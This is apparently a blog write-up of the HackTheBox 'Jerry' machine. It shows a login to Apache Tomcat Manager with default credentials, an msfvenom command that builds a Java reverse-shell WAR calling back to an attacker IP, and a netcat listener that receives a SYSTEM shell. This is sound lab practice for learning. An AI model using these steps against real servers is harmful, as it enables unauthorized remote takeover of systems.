HTB: Jerry

Jerry

Next cab off the rank when sorted by Pwnage is Jerry (after Lame). Again, I went into this one blind.

Ports

We’ve got one port only, 8080. This appears to be Windows, based on the TTL.

8080

We’ve got Apache Tomcat 7.0.88, and as we will soon see it’s running on Windows Server 2012 R2.

7.0.88 is supposed to be vulnerable to a few things; in particular CVE-2019-0232. I try the Metasploit module but it doesn’t seem to want to work.

Default creds

We can log into the Manager app with default creds; namely tomcat:s3cret. There is an authenticated MSF module but I don’t just want to sit here yeeting Metasploit at everything. Let’s go manual:

┌──(root💀kali)-[/opt/htb/jerry]
└─# msfvenom -p java/shell_reverse_tcp lhost=10.10.14.2 lport=1234 -f war -o pwn.war
Payload size: 13397 bytes
Final size of war file: 13397 bytes
Saved as: pwn.war

We can upload and deploy our WAR file using the Manager App in the browser, and with a listener:

┌──(root💀kali)-[/opt/htb/jerry]
└─# nc -nvlp 1234                                                                   
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
#etc
C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,599,585,280 bytes free

Another fairly easy one. They aren’t this easy anymore!